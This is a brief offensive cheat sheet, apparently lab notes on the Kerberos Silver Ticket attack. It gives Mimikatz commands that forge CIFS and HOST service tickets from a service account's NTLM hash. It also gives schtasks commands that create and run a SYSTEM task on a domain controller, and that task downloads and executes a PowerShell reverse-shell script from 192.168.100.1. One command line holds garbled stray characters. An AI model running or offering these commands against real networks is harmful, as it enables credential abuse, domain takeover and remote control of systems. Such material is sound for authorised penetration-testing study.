Silver Ticket

Silver Ticket Attack

rc4 = NTLM hash of the service account; sid = SID of the domain

// For CIFS
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:CIFS /rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"'

// For HOST
Invoke-Mimikatz -Command '"kerberos::golden /domain:dollarcorp.moneycorp.local /sid:S-1-5-21-1874506631-3219952063-538504511 /target:dcorp-dc.dollarcorp.moneycorp.local /service:HOST opl;//rc4:6f5b5acaf7433b3282ac22e21e62ff22 /user:Administrator /ptt"'



//Schedule and execute a task
// Also modify the Invoke-PowerShellTcp.ps1 
schtasks /create /S dcorp-dc.dollarcorp.moneycorp.local/SC Weekly /RU "NT Authority\SYSTEM" /TN "STCheck" /TR "powershell.exe -c 'iex (New-Object Net.WebClient).DownloadString(''http://192.168.100.1:8080/Invoke-PowerShellTcp.ps1''')'"


schtasks /Run /S dcorp-dc.dollarcorp.moneycorp.local /TN "STCheck"


iwr -UseDefaultCredentials http://web04
